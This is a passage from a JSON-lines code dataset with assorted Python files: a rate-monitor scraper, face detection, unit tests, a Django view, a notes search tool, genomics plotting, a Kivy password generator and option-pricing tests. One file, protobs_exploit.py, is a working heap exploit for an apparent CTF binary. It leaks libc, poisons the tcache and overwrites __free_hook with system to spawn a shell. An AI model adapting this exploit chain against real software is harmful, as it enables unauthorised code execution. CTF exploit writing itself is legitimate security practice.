allEngines['WASCell_04_RCDB9'] = processCalcTable(cellTables[9])\n allEngines['WASCell_05_RCDB10'] = processCalcTable(cellTables[11])\n allEngines['WASCell_06_RCDB11'] = processCalcTable(cellTables[13])\n allEngines['WASCell_07_RCDB12'] = processCalcTable(cellTables[15])\n\n return allEngines\n\n\ndef processSimple(table):\n for row in table.find_all('tr'):\n for cell in row.find_all('td'):\n print(cell.get_text(), end=' ')\n print()\n return\n\ndef main():\n config = {}\n config['source']={}\n # the base URL if we need to repeat\n config['source']['base_url'] = 'https://ratesmonitor.hertz.com/RatesMonitoringWeb/calculatorpages/calcmonitoring.jsp?environment=prod'\n itemList = []\n # individual servers\n itemList.append({'name':'calcservers','url':''})\n config['source'][\"urls_to_fetch\"] = itemList\n\n config[\"data_processor\"] = processRateCalc\n config[\"splunk_source\"] = \"hertzCalcServers\"\n config[\"time_interval\"] = 30\n config[\"loop_count\"] = -1\n hc.scrapeData(config)\n \nmain()","sub_path":"extractor-calc-engine-hertz.py","file_name":"extractor-calc-engine-hertz.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10553235","text":"import numpy as np\nimport cv2\nimport sys\n\n\ndef shrinkImage(imagetoreduce):\n\theight, width = imagetoreduce.shape[:2]\n\tmax_height = 800\n\tmax_width = 800\n\n\t# only shrink if img is bigger than required\n\tif max_height < height or max_width < width:\n\t # get scaling factor\n\t print (\"Going to\")\n\t scaling_factor = max_height / float(height)\n\t if max_width/float(width) < scaling_factor:\n\t scaling_factor = max_width / float(width)\n\t # resize image\n\t cv2.resize(imagetoreduce, None, fx=scaling_factor, fy=scaling_factor, interpolation=cv2.INTER_AREA)\n\t return imagetoreduce\n\n\n\n# We point OpenCV's CascadeClassifier function to where our \n# classifier (XML file format) is stored\nface_classifier = cv2.CascadeClassifier('Haarcascades/haarcascade_frontalface_default.xml')\n\n# Load our image then convert it to grayscale\nimage = cv2.imread(sys.argv[1])\nimage2 = shrinkImage(image)\nprint (str(type(image)))\nprint (str(type(image2)))\n#image = shrinkImage(image)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Our classifier returns the ROI of the detected face as a tuple\n# It stores the top left coordinate and the bottom right coordiantes\nfaces = face_classifier.detectMultiScale(gray, 1.3, 5)\n\n# When no faces detected, face_classifier returns and empty tuple\nif faces is ():\n print(\"No faces found\")\n\n# We iterate through our faces array and draw a rectangle\n# over each face in faces\nfor (x,y,w,h) in faces:\n cv2.rectangle(image, (x,y), (x+w,y+h), (127,0,255), 2)\n cv2.imshow('Face Detection', image)\n cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n\n","sub_path":"face_deteaction_pass_img.py","file_name":"face_deteaction_pass_img.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241846313","text":"class MyRange():\n \"\"\" Acts like `range` \"\"\"\n def __init__(self, start, stop, step = 1):\n self.myrng = range(start, stop, step)\n\n\ndef myrange(*args): # treats arguments as a tuple\n \"\"\" Acts like `range` \"\"\"\n n_arguments = len(args)\n if n_arguments not in [1,2,3]:\n raise TypeError(\"myrange only accepts 1 to 3 arguments\")\n if n_arguments == 1:\n return MyRange(0,args[0]).myrng\n if n_arguments == 2:\n return MyRange(args[0], args[1]).myrng\n if n_arguments == 3:\n return MyRange(args[0], args[1], args[2]).myrng\n\n\n\nimport unittest\n\nclass TestMyRangeClass(unittest.TestCase):\n def test_size(self):\n self.assertEqual(len([i for i in myrange(1,10,2)]), len([i for i in range(1,10,2)]))\n\n def test_wrong_number_of_args(self):\n with self.assertRaises(TypeError):\n myrange()\n myrange(1,2,3,4)\n \n def test_last_element(self):\n self.assertEqual(max([i for i in myrange(12)]),max([i for i in range(12)]))\n self.assertEqual(max([i for i in myrange(12,104,3)]),max([i for i in range(12,104,3)]))\n self.assertEqual(max([i for i in myrange(12,1,-1)]),max([i for i in range(12,1,-1)]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"exercises/python/03_advanced/u_test.py","file_name":"u_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"186215746","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.http.response import HttpResponseRedirect\n\nfrom ..models import Farmer, Commune, Village, CallSession, Language\n\nfrom . import base\n\n\nclass FarmerRegistration(TemplateView):\n\n def resolve_voice_labels(self, items, language):\n \"\"\"\n Returns a list of voice labels belonging to the provided list of choice_options.\n \"\"\"\n voice_labels = []\n for item in items:\n voice_labels.append(item.get_voice_fragment_url(language))\n return voice_labels\n\n def render_farmer_registration_form(self, request, session):\n # This is the redirect URL to POST the language selected\n redirect_url = reverse('service-development:farmer-registration', args=[session.id])\n\n if session.language is None:\n return base.redirect_add_get_parameters('service-development:language-selection', session.id,\n redirect_url=redirect_url)\n\n language = session.language\n communes = Commune.objects.all()\n villages = Village.objects.all()\n\n context = {\n \"redirect_url\": redirect_url,\n \"language\": language,\n 'communes': communes,\n 'villages': villages,\n 'commune_voice_labels':self.resolve_voice_labels(communes, language),\n 'village_voice_labels':self.resolve_voice_labels(villages, language),\n }\n\n return render(request, 'farmer_registration.xml', context, content_type='text/xml')\n\n def get(self, request, session_id):\n session = get_object_or_404(CallSession, pk=session_id)\n return self.render_farmer_registration_form(request, session)\n\n def post(self, request, session_id):\n \"\"\"\n After all required elements of the registration process\n have been filled, this function creates the farmer.\n After registration the farmer is redirected back to the start\n of the voice service.\n \"\"\"\n if 'commune_id' not in request.POST:\n raise ValueError('Incorrect request, commune not set')\n if 'village_id' not in request.POST:\n raise ValueError('Incorrect request, village not set')\n\n session = get_object_or_404(CallSession, pk=session_id)\n caller_id = session.caller_id\n commune = request.POST[\"commune_id\"]\n village = request.POST[\"village_id\"]\n\n farmer = Farmer(caller_id=caller_id, commune=commune, village=village, service=session.service)\n\n if session.service.registration_language:\n farmer.language = session.language\n\n farmer.save()\n\n session.link_to_farmer(farmer)\n\n session.record_step(None, \"Registered as farmer: %s\" %str(farmer))\n\n # Return to start of voice service\n return redirect('service-development:voice-service', voice_service_id = session.service.id, session_id = session.id)\n","sub_path":"vsdk/service_development/views/farmer.py","file_name":"farmer.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"448705984","text":"# notes_4.py 26-Jul-2018\r\n\"\"\"\r\nSupport multiple patterns:\r\n pat1 [& pat2 [& pat3 ...]] - must contain pat1 AND pat2 AND pat3 ...\r\n pat1 [| pat2 [| pate ...]] - must contain pat1 OR pat2 OR pat3 ...\r\n\r\n Interpretation:\r\n & pat_N ==> If pat_N is not in line => Don't print line\r\n | pat_N ==> If pat_N is present and no \"& pat\" are missing print line\r\n\r\n patterns have no embeded white space\r\n \r\n\r\nWrite a \"Notes\" program. The program will display lines\r\nfrom a text file, containing a given text string.\r\nTest:\r\nfile name = \"people.notes\"\r\ntext = \"Watertown\"\r\n Implementation Iterations:\r\nSetup test file(s): \"test.notes\", \"people.notes\"\r\n 1.\tRead specific file e.g. \"test.notes\", printing out all lines\r\n 2.\tPrint only lines containing \"student\"\r\n How to match lines ? Google \"python search for substring\" ?\r\n Support case insensitive match (Student, STUDENT)\r\n 3.\tPrompt for, then accept file name, pattern\r\n 4.\t[Extra Credit] Support multiple text patterns\r\n\r\n\"\"\"\r\nimport re\r\n\r\n# Default values\r\ndef_file_name = \"test.notes\"\r\ndef_pattern = \"student\"\r\n\r\n# Set to default values\r\npattern = def_pattern\r\n\r\nwhile True:\r\n file_name = def_file_name\r\n inp = input(\"Enter file name[\" + file_name + \"] \")\r\n inp = inp.rstrip()\r\n if inp == \"\":\r\n inp = file_name\r\n file_name = inp\r\n try:\r\n finp = open(file_name)\r\n break # Got opened file\r\n \r\n except IOError :\r\n print(\"Can't open file \", file_name)\r\n \r\n\r\n\r\n\r\ninp = input(\"Enter pattern[\" + pattern + \"] \")\r\ninp = inp.rstrip()\r\nif inp == \"\":\r\n inp = pattern\r\npattern = inp\r\n\"\"\"\r\nlooking for\r\n begining of string\r\n or white space\r\n or &\r\n or |\r\n followed by group of non-(&|) characters\r\n We accept zero or more whitespace characters to preceed and\r\n follow the beginning character\r\n\"\"\"\r\nif pattern.find('&') < 0 and pattern.find('|') < 0:\r\n pats = []\r\n pat_list = pattern.split() # all space separated\r\n for pat in pat_list:\r\n pats.append(('&', pat))\r\nelse:\r\n pats = re.findall(r'\\s*(^|[\\s&|])\\s*([^&|]+)', pattern)\r\n \r\nor_pats = [] # | pat - accept if no and pat missing \r\nand_pats = [] # & pat - accept only if present\r\n\r\ndef_pat_type = '&' # Default type\r\nif pattern.find('|') >= 0:\r\n def_pat_type = '|' # If we find | we make the default\r\n \r\nfor ind, pat in pats:\r\n if ind == '|':\r\n def_pat_type = ind\r\n or_pats.append(pat)\r\n elif ind == '&':\r\n and_pats.append(pat)\r\n def_pat_type = ind\r\n else:\r\n if def_pat_type == '|': # treat as default type\r\n or_pats.append(pat)\r\n else:\r\n and_pats.append(pat)\r\n\r\npattern_lc = pattern.lower() # Force pattern to lower case\r\nfor line in finp:\r\n line = line.rstrip() # All trailing white space\r\n line_lc = line.lower()\r\n and_found = 0\r\n or_found = 0\r\n for and_pat in and_pats:\r\n if line_lc.find(and_pat) >= 0:\r\n and_found += 1\r\n for or_pat in or_pats:\r\n if line_lc.find(or_pat) >= 0:\r\n or_found += 1\r\n if len(and_pats) > 0:\r\n if and_found == len(and_pats):\r\n if len(or_pats) > 0:\r\n if or_found > 0:\r\n print(line) # At least one of the ors\r\n else:\r\n print(line) # No ors to check\r\n elif or_found > 0:\r\n print(line)\r\n","sub_path":"exercises/notes_4_x.py","file_name":"notes_4_x.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318048661","text":"#!/usr/bin/env python\n\n\"\"\"\n:Author: Sebastian Röner\n:Contact: sebastian.roener@charite.de\n:Date: 08.09.2020\n\"\"\"\n\nimport matplotlib\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy import stats\n\nmatplotlib.use(\"pdf\")\n\n\n# get variables from snakefile\n\nWPS = snakemake.input[\"WPS\"]\nWPS_refs = snakemake.input[\"WPS_ref\"]\nCOV = snakemake.input[\"COV\"]\nCOV_refs = snakemake.input[\"COV_ref\"]\nsample_ID = snakemake.params[\"sample\"]\nref_IDs = snakemake.params[\"ref_IDs\"]\ntarget = snakemake.params[\"target\"]\noutfile = snakemake.output[0]\n\n# def functions\n\n\ndef calculate_flanking_regions(val: int):\n \"\"\"Calculates flanking regions for point of interest.\n\n Args:\n val (int): should be length of value vector\n\n Raises:\n TypeError: Only integers are allowed\n\n Returns:\n [iterator]: range of values around center point (e.g. range(-1000,1000))\n \"\"\"\n\n if not isinstance(val, int):\n raise TypeError(\"Only integers are allowed\")\n\n if val % 2 == 0:\n flank = int(val / 2)\n region = range(-flank, flank)\n elif val % 2 == 1:\n flank_l = int(val / 2 - 0.5)\n flank_r = int(val / 2 + 0.5)\n region = range(-flank_l, flank_r)\n return region\n\n\ndef add_sample(path: str):\n \"\"\"Reads .csv file, calculates mean over all rows and divides by trimmed mean.\n\n Args:\n path (str): Path to a .csv file\n\n Returns:\n [type]: [description]\n \"\"\"\n sample = pd.read_csv(path, header=None).mean()\n sample = sample / stats.trim_mean(sample, 0.25)\n return sample\n\n\n# load tables containing position specific scores for all defined target regions\n# average over all regions per sample and substract the trimmed mean to normalise\n\n\nav_WPS = pd.DataFrame()\nav_WPS[sample_ID] = add_sample(WPS)\nfor (ref_ID, WPS_ref) in zip(ref_IDs, WPS_refs):\n av_WPS[ref_ID] = add_sample(WPS_ref)\n\nav_WPS[\"position\"] = calculate_flanking_regions(len(av_WPS))\nav_WPS = av_WPS.set_index(\"position\")\n\nav_COV = pd.DataFrame()\nav_COV[sample_ID] = add_sample(COV)\nfor (ref_ID, COV_ref) in zip(ref_IDs, COV_refs):\n av_COV[ref_ID] = add_sample(COV_ref)\n\nav_COV[\"position\"] = calculate_flanking_regions(len(av_WPS))\nav_COV = av_COV.set_index(\"position\")\n\n# create line plots and save to a single pdf\n\nwith PdfPages(outfile) as pdf:\n Fig_WPS = av_WPS.plot(\n title=f\"adjusted WPS: {target} target regions\",\n xlabel=\"Position relative to target site\",\n ylabel=\"normalized WPS\",\n )\n Fig_Cov = av_COV.plot(\n title=f\"adjusted read coverage: {target} target regions\",\n xlabel=\"Position relative to target site\",\n ylabel=\"normalized read coverage\",\n )\n pdf.savefig(Fig_WPS.get_figure())\n pdf.savefig(Fig_Cov.get_figure())\n","sub_path":"workflow/scripts/WPS/overlays.py","file_name":"overlays.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"432361080","text":"#!/usr/bin/env python\n\nfrom pwn import *\ncontext.log_level = 'DEBUG'\n\n\ndebug=True\np = process('./Protobs')\n#libc = ELF('./libc.so.6')\nlibc = ELF('./libc.so.6')\n#gdb.attach(p,'heap-analysis')\n\n\ndef create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):\n p.sendlineafter('~$ ', str(2))\n p.sendlineafter(' [ Game ]: ',str(game))\n p.sendlineafter('[ Contrast ]: ', str(contrast))\n p.sendlineafter('[ Gamma ]: ', str(gamma))\n p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))\n p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))\n p.sendlineafter('[ Controller ]: ', str(controller))\n p.sendlineafter('[ Size of Description ]: ', str(size_description))\n\ndef create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):\n p.sendlineafter('~$ ', str(2))\n p.sendlineafter(' [ Game ]: ',str(game))\n p.sendlineafter('[ Contrast ]: ', str(contrast))\n p.sendlineafter('[ Gamma ]: ', str(gamma))\n p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))\n p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))\n p.sendlineafter('[ Controller ]: ', str(controller))\n p.sendlineafter('[ Size of Description ]: ', str(size_description))\n p.sendlineafter('[ Description ]: ',str(description))\n\n\ndef list_():\n p.sendlineafter('protobs@player2:~$ ', str(1))\n ret = p.recvuntil('protobs')\n log.info(\"list of configuration : \" + ret)\n\ndef read(idx,description):\n p.sendlineafter('protobs@player2:~$ ', str(3))\n p.sendlineafter('[ Config Index ]: ',str(idx))\n ret = p.recvuntil('protobs')\n return ret[:-1]\n\n\ndef delete(idx):\n p.sendlineafter('~$ ', str(4))\n p.sendlineafter('[ Config Index ]: ', str(idx))\n\n\n\n\ndescription= \"A\" * 0x60\nsize=0x450\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\ndescription= \"B\" * 511\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\ndescription= \"C\" * 511\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\n\ndelete(1) ## To Not free the head or tail of the heap but the MIDDLE\n\ncreate_without_desc(\"hello\",0,0,0,0,0,0)\nlist_()\np.sendlineafter('@player2:~$ ', str(3))\np.sendlineafter('[ Config Index ]: ',str(1))\np.recvuntil('[ Description ]: ')\n\n\n\n\n\n\n#gef p system\n#Cannot access memory at address 0x7fb53ec9ffd0\n#gef print __libc_start_main\n#Cannot access memory at address 0x7fb53ec73a80\n#gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80\nlibc_offset=0x001e4ca0\nsystem_offset=0x0052fd0\n\nfree_hook = libc.symbols['__free_hook']\n\n\nlibc_leak = u64(p.recv(6).ljust(8, '\\x00'))\nlibc_base = libc_leak - libc_offset\nsystem=libc_base + system_offset\n\n\nlog.info(\"Leak: 0x{:x}\".format(libc_leak))\nlog.info(\"Libc: 0x{:x}\".format(libc_base))\nlog.info(\"system: 0x{:x}\".format(system))\nlog.info('__free_hook: ' + hex(free_hook))\n\n### SECOND PART\ndescription = \"0xdeadbeef\"\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\ndescription = \"0xdeadbeef\"\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n\ndelete(3)\n\ndescription = \"0xdeadbeef\"\nsize = 0x100\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\ndelete(3) # delete config\n\n\n\n\n#### EXPLOIT ON https://syedfarazabrar.com/2019-10-12-picoctf-2019-heap-challs/#zero_to_hero\n# Add a 0x50 and 0x180 chunk\ndescription = \"A\" * 0x58\nsize = 0x58\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\ndescription = \"B\"*0x180\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n\n\n\n# Free them both\ndelete(3) #0 # Goes into 0x50 tcache bin\ndelete(4) #1 # Goes into 0x180 tcache bin\n\n# Get back the 0x50 chunk, but also null byte overflow into the 0x180 chunk\n# Also put in /bin/sh\\x00 into it for later use\nsize=0x58\ndescription='/bin/sh\\x00' + 'A'*0x50\ncreate_desc(\"hello\",0,0,0,0,0,size,description) # chunk A\n\n# The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)\n# This means we can free it again immediately\ndelete(5) #1 # Goes into 0xf0 tcache bin\n\n\n# Get back the 0x100 chunk out of the 0x180 tcache bin\nsize=0x180\ndescription='C'*0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description) # chunk B\n\n\n# Since tcache_get will null out the key, we can free it immediately\ndelete(7) #3 # Goes into 0xf0 tcache bin\n\n# Now: tcache[0x100] -> Chunk B <- Chunk B\n\n\n# We do the usual tcache poisoning attack\n\n# Get Chunk B from 0xf0 tcache bin and change it's FD to __free_hook\nsize=0xf0\ndescription=p64(free_hook) + 'D'*0xe8\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\nsize=0xf0\ndescription='E'*0xf0\n# Allocates chunk B again\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\nsize=0xf0\ndescription=p64(system) + 'F'*0xe8\n# Allocates chunk on __free_hook, change it to system\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n# Call free on the chunk with /bin/sh\\x00 in it\n# This will then call free('/bin/sh\\x00') which calls system('/bin/sh\\x00')\ndelete(4) #0\n\np.interactive()\n","sub_path":"protobs_exploit.py","file_name":"protobs_exploit.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"151678625","text":"################################################## pw-gen-alg.py\n# Creation Date:\t21/12/2016\n# Current Version:\t0.1\n# Author:\t\tmostly\n\n#################### LIBRARIES\nimport kivy\nkivy.require('1.1.3')\nfrom kivy.app import App # GUI\n#from kivy.uix.gridlayout import GridLayout\n#from kivy.uix.anchorlayout import AnchorLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.button import Button\nfrom kivy.uix.dropdown import DropDown\nimport hashlib # Hasing used by various algorithms\nimport pickle # I/O for character tables\nimport random # Creating character tables\nimport time # Filenames and seeding\nimport os # Finding character tables\nimport os.path \n\n#################### DEFINITIONS\nDEFAULT_CHARACTER_SET = [\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],\n ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'], \n ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0'], \n ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '+', '=']\n ]\nENCRYPTION_METHODS = ('JoadCrypt-SHA256', 'JoadCrypt-MD5')\nHASHING_METHODS = ('SHA1', 'SHA256', 'MD5')\n\n\n#################### FUNCTIONS\n#------------------- Generate_Default_Character_Table\n# Creates a new character tables\n# Inputs : None\n# Outputs : None\n#\ndef Generate_Default_Character_Table(tableTitle):\n characterTable = {}\n\n characterTable['Title'] = tableTitle\n\n # Current time\n currentTime = time.localtime()\n characterTable['Date'] = str(currentTime.tm_year) + '-' + str(currentTime.tm_mon) + '-' + str(currentTime.tm_mday) + ' ' + str(currentTime.tm_hour) + ':' + str(currentTime.tm_min) + ':' + str(currentTime.tm_sec)\n\n characterTable['Exclusion-String'] = ',./<>?;\":[]{}`~' + \"'\" + \"\\\\\"\n\n\n # Set length\n characterTable['Set-Length'] = 50\n\n # Set up character subsets\n wBuffer = list(DEFAULT_CHARACTER_SET[0])\n xBuffer = list(DEFAULT_CHARACTER_SET[1])\n yBuffer = list(DEFAULT_CHARACTER_SET[2])\n zBuffer = list(DEFAULT_CHARACTER_SET[3])\n\n # Randomize the subsets to produce the data sets\n random.seed()\n for dataSetNumber in range(characterTable['Set-Length']):\n dataSetIndex = 'Data-' + str(dataSetNumber)\n random.shuffle(wBuffer)\n random.shuffle(xBuffer)\n random.shuffle(yBuffer)\n random.shuffle(zBuffer)\n characterTable[dataSetIndex] = [wBuffer, xBuffer, yBuffer, zBuffer]\n \n outputFileName = characterTable['Title']\n pickle.dump(characterTable, open(outputFileName, 'wb'))\n\n#################### WIDGETS\n#------------------- Main_Screen\nclass Main_Screen(FloatLayout):\n def __init__(self, **kwargs):\n super(Main_Screen, self).__init__(**kwargs)\n self.size = (350, 350)\n \n # Character Table Encryption label\n self.add_widget(Label(text='Character Table Encryption', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.95}))\n # Character Table Selector\n self.add_widget(Label(text='Character Table', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.90}))\n # Check for character tables\n characterTablesPresent = []\n for entry in os.listdir('.'):\n if os.path.splitext(os.path.basename(entry))[1] == '.ct':\n characterTablesPresent.append(entry)\n # If no character tables present create one\n if len(characterTablesPresent) == 0:\n currentTime = time.localtime()\n # Table name = default.ct\n tableTitle = 'default.ct'\n Generate_Default_Character_Table(tableTitle)\n characterTablesPresent.append(tableTitle)\n # Character table dropdown selector\n self.dropdownct = DropDown()\n for characterTable in characterTablesPresent:\n btn = Button(text='%r' % characterTable, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownct.select(btn.text))\n self.dropdownct.add_widget(btn)\n self.selectorButtonCt = Button(text='Select character table', size_hint=(0.6, 0.05), pos_hint={'x':0.35, 'y':0.90})\n self.selectorButtonCt.bind(on_release=self.dropdownct.open)\n self.dropdownct.bind(on_select=lambda instance, x: setattr(self.selectorButtonCt, 'text', x))\n self.add_widget(self.selectorButtonCt)\n # Encryption Selector\n self.add_widget(Label(text='Encryption Type', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.85}))\n # Encryption dropdown selector\n self.dropdownenc = DropDown()\n for encryptionMethod in ENCRYPTION_METHODS:\n btn = Button(text='%r' % encryptionMethod, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownenc.select(btn.text))\n self.dropdownenc.add_widget(btn)\n self.selectorButtonEnc = Button(text='Select encryption method', size_hint=(0.6, 0.05), pos_hint={'x':0.35, 'y':0.85})\n self.selectorButtonEnc.bind(on_release=self.dropdownenc.open)\n self.dropdownenc.bind(on_select=lambda instance, x: setattr(self.selectorButtonEnc, 'text', x))\n self.add_widget(self.selectorButtonEnc)\n\n # Hashing Encryption label\n self.add_widget(Label(text='Hashing Encryption', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.75}))\n # Hashing Method Selector\n self.add_widget(Label(text='Hashing Method', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.70}))\n # Hashing method dropdown selector\n self.dropdownhash = DropDown()\n for hashingMethod in HASHING_METHODS:\n btn = Button(text='%r' % hashingMethod, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownhash.select(btn.text))\n self.dropdownhash.add_widget(btn)\n self.selectorButtonHash = Button(text='Select hashing method', size_hint=(0.6,0.05), pos_hint={'x':0.35,'y':0.70})\n self.selectorButtonHash.bind(on_release=self.dropdownhash.open)\n self.dropdownhash.bind(on_select=lambda instance, x: setattr(self.selectorButtonHash, 'text', x))\n self.add_widget(self.selectorButtonHash)\n\n # Input strings labels\n self.add_widget(Label(text='Input Strings', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.60}))\n # Input strings text input\n self.add_widget(Label(text='Environment', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.55}))\n self.environment = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.55})\n self.add_widget(self.environment)\n self.add_widget(Label(text='Username', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.5}))\n self.username = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.5})\n self.add_widget(self.username)\n self.add_widget(Label(text='Timestring', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.45}))\n self.timestring = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.45})\n self.add_widget(self.timestring)\n\n #self.add_widget(Label(text='Status:', size_hint_x=None, width=130))\n #self.status = Label(text='Waiting for input', size_hint_x=None, width=300)\n #self.add_widget(self.status)\n #self.generate = Button(text='Generate', size_hint_x=None, width=130)\n #self.add_widget(self.generate)\n #self.generate.bind(on_press=self.Generate_Pressed)\n #self.output = TextInput(multiline=False, size_hint_x=None, width=300)\n #self.add_widget(self.output)\n\n#################### APPLICATION CLASS\nclass PwGenAlg(App):\n def build(self):\n return Main_Screen()\n\nif __name__ == '__main__':\n PwGenAlg().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81832252","text":"from __future__ import division\n\nimport random\nfrom copy import copy\nfrom operator import attrgetter\nfrom unittest import TestCase, skip, SkipTest\n\nfrom parameterized import parameterized\nimport numpy as np\nfrom numpy.testing import assert_almost_equal, assert_allclose\nimport pandas as pd\nfrom pandas.core.generic import NDFrame\nfrom scipy import stats\nfrom six import iteritems, wraps\nimport quantbear\n\nDECIMAL_PLACES = 8\n\nclass TestStats(TestCase):\n\n @parameterized.expand([\n (100, 100, 1, 0.2, 0, True, 7.9655674554058038),\n (100, 100, 1, 0.2, 0, False, 7.9655674554058038),\n (100, 125, 1, 0.2, 0, True, 1.4824118915130242),\n (100, 125, 1, 0.2, 0, False, 26.482411891513024),\n (100, 75, 1, 0.2, 0, True, 25.581185846275545),\n (100, 75, 1, 0.2, 0, False, 0.58118584627555148),\n (100, 100, 0.75, 0.2, 0, True, 6.9012553440432924),\n (100, 100, 1.75, 0.2, 0, True, 10.524315781125253),\n (100, 100, 1, 0.5, 0, True, 19.741265136584744),\n (100, 100, 1, 0, 0, True, np.nan),\n (100, 100, 1, 0.2, 0.05, True, 10.450583572185572),\n (0.00000001, 100, 1, 0.2, 0.00, True, 0.0)\n ])\n def test_black_scholes(self, s, k, t, v, rf, call, expected):\n black_scholes = self.quantbear.black_scholes(\n s,\n k,\n t,\n v,\n rf,\n call=call\n )\n assert_almost_equal(\n black_scholes,\n expected,\n 4)\n\n @property\n def quantbear(self):\n \"\"\"\n Returns a wrapper around the quantbear module, so tests can\n perform input conversions or return type checks on each call to an\n quantbear function.\n Each test case subclass can override this property, so that all the\n same tests are run, but with different function inputs or type checks.\n This was done as part of enabling quantbear functions to work with\n inputs of either pd.Series or np.ndarray, with the expectation that\n they will return the same type as their input.\n Returns\n -------\n quantbear\n Notes\n -----\n Since some parameterized test parameters refer to attributes on the\n real quantbear module at class body scope, this property must be\n defined later in the body than those references. That way, the\n attributes are looked up on the quantbear module, not this property.\n \"\"\"\n return ReturnTypequantbearProxy(self, (pd.Series, float))\n\n\nclass ReturnTypequantbearProxy(object):\n \"\"\"\n A wrapper around the quantbear module which, on each function call, asserts\n that the type of the return value is in a given set.\n Also asserts that inputs were not modified by the quantbear function call.\n Calling an instance with kwargs will return a new copy with those\n attributes overridden.\n \"\"\"\n def __init__(self, test_case, return_types):\n self._test_case = test_case\n self._return_types = return_types\n\n def __call__(self, **kwargs):\n dupe = copy(self)\n\n for k, v in iteritems(kwargs):\n attr = '_' + k\n if hasattr(dupe, attr):\n setattr(dupe, attr, v)\n\n return dupe\n\n def __copy__(self):\n newone = type(self).__new__(type(self))\n newone.__dict__.update(self.__dict__)\n return newone\n\n def __getattr__(self, item):\n return self._check_input_not_mutated(\n self._check_return_type(\n getattr(quantbear, item)\n )\n )\n\n def _check_return_type(self, func):\n @wraps(func)\n def check_return_type(*args, **kwargs):\n result = func(*args, **kwargs)\n self._test_case.assertIsInstance(result, self._return_types)\n return result\n\n return check_return_type\n\n def _check_input_not_mutated(self, func):\n @wraps(func)\n def check_not_mutated(*args, **kwargs):\n # Copy inputs to compare them to originals later.\n arg_copies = [(i, arg.copy()) for i, arg in enumerate(args)\n if isinstance(arg, (NDFrame, np.ndarray))]\n kwarg_copies = {\n k: v.copy() for k, v in iteritems(kwargs)\n if isinstance(v, (NDFrame, np.ndarray))\n }\n\n result = func(*args, **kwargs)\n\n # Check that inputs weren't mutated by func.\n for i, arg_copy in arg_copies:\n assert_allclose(\n 